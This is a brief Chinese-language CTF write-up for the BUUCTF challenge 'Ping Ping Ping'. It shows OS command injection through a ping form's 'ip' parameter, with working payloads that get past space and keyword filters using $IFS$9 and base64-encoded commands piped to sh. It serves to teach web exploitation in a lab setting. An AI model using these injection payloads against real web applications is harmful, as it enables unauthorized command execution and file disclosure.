【BUUCTF】[GXYCTF2019]Ping Ping Ping 1

【BUUCTF】[GXYCTF2019]Ping Ping Ping 1_第1张图片【BUUCTF】[GXYCTF2019]Ping Ping Ping 1_第2张图片列出当前目录下的文件
?ip=1;ls
【BUUCTF】[GXYCTF2019]Ping Ping Ping 1_第3张图片那么我们就要打开flag.php文件
【BUUCTF】[GXYCTF2019]Ping Ping Ping 1_第4张图片
发现过滤了空格
经过测试我们发现$IFS$9 可以绕过空格
在这里插入图片描述又发现它绕过了flag
我们先看看index.php
【BUUCTF】[GXYCTF2019]Ping Ping Ping 1_第5张图片
得知flag的过滤方式
我们可以采用base64方法编码方式绕过
需要执行的命令:

cat$IFS$9flag.php

编码后:

Y2F0JElGUyQ5ZmxhZy5waHA=

so, payload如下

?ip=1;echo$IFS$9Y2F0JElGUyQ5ZmxhZy5waHA=|base64$IFS$9-d|sh

【BUUCTF】[GXYCTF2019]Ping Ping Ping 1_第6张图片

你可能感兴趣的:(ctf,php,linux,开发语言)